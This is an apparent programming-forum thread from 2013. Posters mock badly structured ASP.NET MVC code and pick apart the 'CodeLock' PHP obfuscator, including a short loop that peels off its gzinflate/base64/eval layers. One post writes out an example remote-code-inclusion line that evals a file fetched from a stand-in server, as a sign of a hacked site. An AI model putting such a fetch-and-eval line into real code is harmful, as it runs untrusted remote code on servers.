|
Gazpacho posted:Well if you decide to fix it be really careful and go slow and test everything. In my previous job I rewrote some copy-pasted code to about a tenth of the code size and felt really good about it until a customer site in Japan said they were broken. (I had left one of their copies out of the new version.) ASP MVC automatically HTML encodes any string variables that are used in a template, unless you first pass the value to Html.Raw. So in that guy's original code, he literally could just do: code:
|
# ? Jan 12, 2013 05:17 |
|
|
# ? May 28, 2024 23:13 |
|
I know that and it doesn't change what I said.
|
# ? Jan 12, 2013 10:41 |
|
Definitely not going to touch any of that poo poo unless I have to. If a change or fix requires a decent amount of work on a page, then I'll redo the page, if only because the messed up outlining and complete lack of any structure makes it really hard to find anything. But the stuff I posted is just the tip of the ice-berg, the real problems are far more serious. Technically it's an MVC web site, but so far, I've hardly seen any use of the "M", instead everything is passed through the ViewBag/ViewData. There's 50+ pages, almost all with dynamic content, but somehow less than 10 Model classes. The Session is also misused terribly (big surprise), yesterday I found a Controller action that stuck all sorts of stuff in the Session, then called a method, which proceeded to pull that same stuff out of the Session, instead of just simply passing it as method parameters. I fixed that, but because everything is copy-pasted everywhere, I know I can just open up any other Controller and find the exact same crap. Add onto that that everything that's put in the Session is needlessly converted to a string first, so there's a ton of parsing code spread all over the place.
|
# ? Jan 12, 2013 20:39 |
|
Man, I thought the MVC app I had to deal with was bad. We have tons of Controllers that do way too much, but at least we use Models. That sounds like a nightmare.
|
# ? Jan 12, 2013 22:12 |
|
A new client just emailed me asking if I could fix their site. Here's the error:code:
|
# ? Jan 15, 2013 00:38 |
|
That's probably not a coding horror on their end. When you google for wordpress help, you get things with a lot of recursive eval()s in order to sneak malicious and/or spammy stuff in. For some reason, people who would never just install random crap on their personal computer think it's okay to do that on their servers.
|
# ? Jan 15, 2013 00:48 |
bobthecheese posted:A new client just emailed me asking if I could fix their site. Here's the error: php:<?php eval(file_get_contents("http://myserver.com/include/maininclude.php.txt")); But ^^^ yeah it may very well be a sign that they were hacked.
|
|
# ? Jan 15, 2013 00:50 |
|
I guess this isn't code but it made me laugh, as this guy usually writes with cold efficiency and organizational rigidity. Random txt file in some folder in XCode: BUGS: -BS loving ;laskdjf Target retain issue w/ decoding -why the gently caress are tiles above character where doors are? Oh wait I know nvm it’s fine. -Corpses moving around on pan -break up invent logic away from giant tumor method gently caress me -MAP hosed up missing connections -call nan -tiles not matching up next to the thing Awesome dude. CALL NAN.
|
# ? Jan 15, 2013 01:40 |
|
C++ code:
|
# ? Jan 15, 2013 02:26 |
|
nielsm posted:
Pulled down the code. Not hacked... "encrypted". php:<? /* WARNING: This script is protected. Any attempt to reverse engineer, debug or de-code this file or its dependent files is strictly prohibited */ ?> To be fair, the "encryption" is just repeatedly gzdeflate(base64encode(the code)), so it'll be annoying to get at, but not impossible. php:<? eval(gzinflate(base64_decode($codelock_lock))); ?>
|
# ? Jan 15, 2013 02:28 |
|
Code lock defeated:php:<? $codelock_lock = gzinflate(base64_decode($codelock_lock)); while (strpos($codelock_lock, 'eval') === 0) { $codelock_lock = gzinflate(base64_decode(str_replace(array('eval(', 'gzinflate(', 'base64_decode(', ')'),'',$codelock_lock))); } echo $codelock_lock."\n"; ?> #EDIT: quote:Codelock for PHP is a strong deterrent. Most end users will not be able to decipher your code and will have a difficult time working through the encryption used by the software. It will take more than the average programmer to decipher your scripts. The fact is, any PHP encryption program does needs to decrypt the file at some time, so the code will theoretically be available to experienced crackers during its execution. However, it would take considerable expertise, a lot of time and a rewrite of some of the core PHP decode engine (codelock.php) to get at it. Note: The Decryptor file (codelock.php) is also Encrypted. As well as all this, it would be a violation of our reverse engineering policy. Apparently I'm a skilled cracker now. bobthecheese fucked around with this message at 02:52 on Jan 15, 2013 |
# ? Jan 15, 2013 02:45 |
|
Looks like they used an actual photo of a Codelock user in their banner: "eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1)? What the gently caress is this, have I been hacked?" The Gripper fucked around with this message at 03:07 on Jan 15, 2013 |
# ? Jan 15, 2013 03:03 |
Well their "HTML encryption" scheme is slightly more complex. It involves this snippet getting unescape()'d and eval()'d, then used to "decrypt" the rest of the document.JavaScript code:
|
|
# ? Jan 15, 2013 03:12 |
|
This is security through obscurity taken to its logical conclusion.
|
# ? Jan 15, 2013 06:16 |
|
Harvey Mantaco posted:CALL NAN. What a maroon! code:
|
# ? Jan 15, 2013 06:48 |
|
Am I wrong or does this Codelock thing require you to uncompress/decode the script each time the page is loaded? It seems like that's a great way to waste cycles on every request by adding 2->n "decryption" steps every time.
|
# ? Jan 15, 2013 06:51 |
|
Anything that actually uses codelock is likely to be sufficiently awful that the codelock overhead is relatively minor.
|
# ? Jan 15, 2013 06:53 |
|
bobthecheese posted:Pulled down the code. Not hacked... "encrypted". Besides, look at CodeLock's website: code:
|
# ? Jan 15, 2013 07:08 |
|
Holy poo poo is that actually BBCode in a comment? Though I guess it kind if makes sense if you expect clueless idiots to copy-paste it everywhere asking for help.
|
# ? Jan 15, 2013 09:06 |
|
Hey, man, do you want people to steal your images? No? Better encrypt your PHP then. e: Source-diving the trial (which is just a bunch of base64ed PHP) is amazing. Opinion Haver fucked around with this message at 09:23 on Jan 15, 2013 |
# ? Jan 15, 2013 09:09 |
|
Jabor posted:Holy poo poo is that actually BBCode in a comment? No, the forums just do that automatically. Try it out.
|
# ? Jan 15, 2013 09:19 |
|
yaoi prophet posted:Hey, man, do you want people to steal your images? No? Better encrypt your PHP then. codelock posted:Return URLs - For some credit card processing companies (such as PAYPAL and EGOLD) it is possible to view the source of web pages and look at the return (thanks for purchasing) page, where you can directly go to the URL, click on the link to download the software without paying for it
|
# ? Jan 15, 2013 09:36 |
|
Suspicious Dish posted:No, the forums just do that automatically. Try it out. code:
Okay yeah, I turned off that little checkbox. Seems like a dumb feature though.
|
# ? Jan 15, 2013 09:58 |
|
Zamujasa posted:When I'm looking over hacked Wordpress installs that's basically the same thing I see; gzinflate, base64 decode, eval. So when you say "hacked", do you mean someone actually broke in or someone decided to install a smilies plugin with obfuscated source code? yaoi prophet posted:Hey, man, do you want people to steal your images? No? Better encrypt your PHP then. quote:If you have a clever script (i.e. written in PHP) Riiiighhht....
|
# ? Jan 15, 2013 10:36 |
|
ultramiraculous posted:
Did they mean to say that or do they just not know what id est means?
|
# ? Jan 15, 2013 12:34 |
|
Optimus Prime Ribs posted:
|
# ? Jan 15, 2013 12:41 |
|
yaoi prophet posted:Hey, man, do you want people to steal your images? No? Better encrypt your PHP then. php:<? @chmod("$codelock_enc", 0777); $codelock_fp2 = @fopen("$codelock_enc", "wb"); if ($codelock_fp2) { } else { echo "<br /><b>Error!</b> There is a write permission problem. You need to CHMOD the file: <b>$codelock_enc</b> to 777."; die(); } ?>
|
# ? Jan 15, 2013 17:35 |
|
Munkeymon posted:How do you go around so willfully ignorant as to not even look up the conditional operators.
|
# ? Jan 15, 2013 17:43 |
|
The Gripper posted:It's creative obfuscation - make the reader so angry he can't read any more. Doesn't seem to be working, this code is as absorbing as a car crash: code:
code:
|
# ? Jan 15, 2013 18:39 |
qntm posted:And every single variable's name starts with "codelock" I do this too, when developing plugins for CMSes. I'm always careful with the scope of my variables, but it can't hurt to have unique variable names just in case.
|
|
# ? Jan 15, 2013 19:00 |
|
Munkeymon posted:These guys are just chock full of good advice. Also, they use that empty conditional block idiom all over the loving place that drives me goddamn nuts when I see it. How do you go around so willfully ignorant as to not even look up the conditional operators.
|
# ? Jan 15, 2013 19:05 |
|
Eruonen posted:I do this too, when developing plugins for CMSes. I'm always careful with the scope of my variables, but it can't hurt to have unique variable names just in case. Perhaps, if there were some way to put associated Names in their own Space, we wouldn't have to prefix them ourselves to prevent Collisions. But alack!, such a technology is beyond our grasp, despite our most earnest Declarations.
|
# ? Jan 15, 2013 19:07 |
|
Plorkyeran posted:That's probably a deliberate style choice rather than ignorance. There's a certain group of people that think you should do that rather than negating the conditional because they think it's too easy to miss the !.
|
# ? Jan 15, 2013 19:15 |
|
ultramiraculous posted:So when you say "hacked", do you mean someone actually broke in or someone decided to install a smilies plugin with obfuscated source code? I'm talking about malware pages that get in through a plugin, but even in other cases. I've had one instance where a file was somehow uploaded with no other vulnerable PHP code (just some basic pages that had no file operations or user-input other than numbers for math/gd). Stuff like remote shells/file managers. It's not always stupid plugins that are vulnerable, either. Plenty of well-known WordPress plugins are vulnerable, especially if you don't keep it up to date. I'm kind of disappointed that their site didn't feature any obfuscation or anti-rightclick Javascript, though. I was hoping for something more exciting.
|
# ? Jan 15, 2013 19:18 |
|
Plorkyeran posted:That's probably a deliberate style choice rather than ignorance. There's a certain group of people that think you should do that rather than negating the conditional because they think it's too easy to miss the !. It's true, comprehending code does become rather difficult when you start ignoring random characters.
|
# ? Jan 15, 2013 20:57 |
|
Plorkyeran posted:That's probably a deliberate style choice rather than ignorance. There's a certain group of people that think you should do that rather than negating the conditional because they think it's too easy to miss the !. yeah, but then there are tons of empty else branches all over the place.
|
# ? Jan 15, 2013 21:57 |
|
Aleksei Vasiliev posted:So use == false or something, not an empty true block. In fact using false == function() is better still.
|
# ? Jan 15, 2013 21:59 |
Plorkyeran posted:That's probably a deliberate style choice rather than ignorance. There's a certain group of people that think you should do that rather than negating the conditional because they think it's too easy to miss the !. Not the same problem, but this reminded me of when I found a if (!(!(object))) once.
|
|
# ? Jan 15, 2013 22:19 |
|
Manslaughter posted:Not the same problem, but this reminded me of when I found a if (!(!(object))) once. The !!expr construct is a somewhat common pattern in a few languages; you can think of !! as the cast-to-bool operator, because it normalizes the following expression to be exactly true or false, which is sometimes desirable.
|
# ? Jan 15, 2013 22:30 |
|
|
# ? May 28, 2024 23:13 |
|
Manslaughter posted:Not the same problem, but this reminded me of when I found a if (!(!(object))) once. Double not is a C idiom to normalize a value into the normal 0/1 boolean form. e: foiled by the slowness of phone posting
|
# ? Jan 15, 2013 22:32 |